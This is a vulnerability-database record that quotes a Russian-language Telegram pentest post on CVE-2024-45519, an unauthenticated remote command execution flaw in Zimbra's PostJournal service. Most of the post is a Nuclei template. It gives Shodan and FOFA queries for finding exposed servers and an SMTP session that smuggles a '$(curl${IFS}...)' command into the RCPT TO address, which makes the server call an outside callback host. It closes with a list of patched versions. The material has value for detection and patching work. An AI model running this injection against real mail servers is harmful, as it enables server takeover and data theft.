{"uuid": "f320026c-6323-4ba5-9792-27dc838eb3b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/pt_soft/376", "content": "\ud83c\udf83 CVE-2024-45519 : Zimbra - Remote Command Execution\n\nZimbra - \u0448\u0438\u0440\u043e\u043a\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0439 \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u0439 \u0441\u0435\u0440\u0432\u0435\u0440 \u0438 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u0430 \u0434\u043b\u044f \u0441\u043e\u0432\u043c\u0435\u0441\u0442\u043d\u043e\u0439 \u0440\u0430\u0431\u043e\u0442\u044b\n\nNuclei \u0448\u0430\u0431\u043b\u043e\u043d:\n\nid: CVE-2024-45519\n\ninfo:\n  name: Zimbra Collaboration Suite &lt; 9.0.0 - Remote Code Execution\n  author: pdresearch,iamnoooob,parthmalhotra,ice3man543\n  severity: critical\n  description: |\n    SMTP-based vulnerability in the PostJournal service of Zimbra Collaboration Suite that allows unauthenticated attackers to inject arbitrary commands. This vulnerability arises due to improper sanitization of SMTP input, enabling attackers to craft malicious SMTP messages that execute commands under the Zimbra user context. Successful exploitation can lead to unauthorized access, privilege escalation, and potential compromise of the affected system\u2019s integrity and confidentiality.\n  reference:\n    - https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories\n  classification:\n    cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*\n  metadata:\n    vendor: synacor\n    product: zimbra_collaboration_suite\n    shodan-query:\n      - http.title:\"zimbra collaboration suite\"\n      - http.title:\"zimbra web client sign in\"\n      - http.favicon.hash:1624375939\n    fofa-query:\n      - title=\"zimbra web client sign in\"\n      - title=\"zimbra collaboration suite\"\n  tags: cve,cve2024,rce,zimbra\n\njavascript:\n  - pre-condition: |\n      isPortOpen(Host,Port);\n    code: |\n      let m = require('nuclei/net');\n      let address = Host+\":\"+Port;\n      let conn;\n      conn=  m.Open('tcp', address)\n      conn.Send('EHLO localhost\\r\\n');\n      conn.RecvString()\n      conn.Send('MAIL FROM: \\r\\n');\n      conn.RecvString()\n      conn.Send('RCPT TO: &lt;\"aabbb$(curl${IFS}'+oast+')\"@mail.domain.com&gt;\\r\\n');\n      conn.RecvString()\n      conn.Send('DATA\\r\\n');\n      conn.RecvString()\n      conn.Send('aaa\\r\\n');\n      conn.RecvString()\n      conn.Send('.\\r\\n');\n      resp = conn.RecvString()\n      conn.Send('QUIT\\r\\n');\n      conn.Close()\n      resp\n    args:\n      Host: \"{{Host}}\"\n      Port: 25\n      oast: \"{{interactsh-url}}\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"http\"\n\n      - type: word\n        words:\n          - \"message delivered\"\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0430 \u0432 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 9.0.0 Patch 41 \u0438 \u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u0437\u0434\u043d\u0438\u0445, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0432 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 10.0.9 \u0438 10.1.1 \u0438 Zimbra 8.8.15 Patch 46 \u0438 \u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u0437\u0434\u043d\u0438\u0445\n\n\ud83d\udcbb PoC\n\n#rce #cve #zimbra #poc\n\n\u2708\ufe0f // Pentest HaT \ud83c\udfa9", "creation_timestamp": "2024-10-06T09:04:26.000000Z"}